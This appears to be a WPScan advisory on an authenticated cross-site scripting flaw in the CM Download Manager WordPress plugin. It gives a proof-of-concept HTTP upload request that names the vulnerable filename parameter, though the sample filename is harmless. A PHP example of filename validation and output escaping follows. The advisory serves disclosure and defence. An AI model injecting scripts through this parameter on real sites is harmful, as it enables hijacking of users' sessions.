wpvulndb
WPVDB-ID:461D770C-98BE-4C09-9FE8-DA4FE74AAC2B
History: Oct 22, 2020 - 12:00 a.m.

CM Download Manager < 2.8.0 - Authenticated Cross-Site Scripting

2020-10-22 00:00:00
wpscan.com
8
cross-site scripting
cm download manager
filename validation

EPSS: 0.001 (Percentile: 32.7%)

The plugin does not properly validate and sanitise the uploaded filename, which could result in a Cross-Site Scripting issue.

PoC

Vulnerable page - ‘cmdownload/add/’
Vulnerable parameter - ‘filename’ in ‘Content-Disposition’ Header

    POST /cmdownload/add/ HTTP/1.1
    Host: localhost:8081
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------297219106631036445401265881685
    Content-Length: 1147
    Origin: http://localhost:8081
    Connection: close
    Referer: http://localhost:8081/cmdownload/add/
    Cookie: comment_author_8dec71ede39ad9ff3b3fbc03311bdc45=eee; comment_author_email_8dec71ede39ad9ff3b3fbc03311bdc45=eee%40mail.ru; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_8dec71ede39ad9ff3b3fbc03311bdc45=test%7C1595793663%7C2B6NRI0OfyfJBfpulgmlcilvU96g754sgpLJh8GeNdA%7Ccf65a0a17f07e0e3180504eed05869ab0aa68af496aba7d26aa1848edf97fbea; wp-settings-time-1=1595621338; PHPSESSID=153061963252781ff3b221c0305d536e; wp-settings-1=editor%3Dtinymce
    Upgrade-Insecure-Requests: 1

    -----------------------------297219106631036445401265881685
    Content-Disposition: form-data; name="CMDM_AddDownloadForm_title"

    test name
    -----------------------------297219106631036445401265881685
    Content-Disposition: form-data; name="CMDM_AddDownloadForm_package"; filename="users.doc"
    Content-Type: application/msword

    some test data
    -----------------------------297219106631036445401265881685
    Content-Disposition: form-data; name="CMDM_AddDownloadForm_categories[]"

    17
    -----------------------------297219106631036445401265881685
    Content-Disposition: form-data; name="CMDM_AddDownloadForm_description"

    222
    -----------------------------297219106631036445401265881685
    Content-Disposition: form-data; name="CMDM_AddDownloadForm_screenshots"

    []
    -----------------------------297219106631036445401265881685
    Content-Disposition: form-data; name="CMDM_AddDownloadForm_screenshots-caches"

    []
    -----------------------------297219106631036445401265881685
    Content-Disposition: form-data; name="CMDM_AddDownloadForm_submit"

    Add
    -----------------------------297219106631036445401265881685--
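
Added example (not from the advisory and not the plugin's code): the two controls the description says are missing, validating the client-supplied 'filename' before it is stored and escaping it when it is rendered. The function names, the extension allowlist and the sample inputs are assumptions made up for illustration.

```php
<?php
// Added example: hypothetical helpers, not CM Download Manager's code.
const ALLOWED_EXTENSIONS = ['doc', 'docx', 'pdf', 'zip']; // assumed allowlist

/**
 * Reduce a client-supplied upload filename (the Content-Disposition
 * 'filename' value) to a safe stored name. Returns null if unacceptable.
 */
function safe_upload_name(string $clientName): ?string
{
    // Drop any path component; treat backslashes as separators too.
    $name = basename(str_replace('\\', '/', $clientName));
    // Keep letters, digits, dot, dash, underscore only. This removes
    // < > " ' & and control characters that matter in HTML contexts.
    $name = preg_replace('/[^A-Za-z0-9._-]/', '', $name) ?? '';
    $name = ltrim($name, '.');                 // no hidden or dot-only names
    $ext  = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    $stem = pathinfo($name, PATHINFO_FILENAME);
    if ($stem === '' || !in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    // Flatten inner dots so "a.php.doc" cannot carry a second extension.
    $stem = str_replace('.', '_', $stem);
    return substr($stem, 0, 100) . '.' . $ext;
}

/** Escape at output time too, so names stored before the fix stay inert. */
function render_download_label(string $storedName): string
{
    return '<span class="download-name">'
        . htmlspecialchars($storedName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</span>';
}

// Constructed sample inputs (not taken from the advisory).
$samples = ['users.doc', '../../users.doc', 'q3 <i>report.doc', 'run.php', '.doc'];
foreach ($samples as $raw) {
    $safe = safe_upload_name($raw);
    printf("%-20s => %s\n", $raw, $safe ?? 'REJECTED');
}
echo render_download_label('legacy "<b>name</b>".doc'), "\n";
```

In WordPress code the same two steps are normally done with core's sanitize_file_name() on input and esc_html() or esc_attr() on output.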
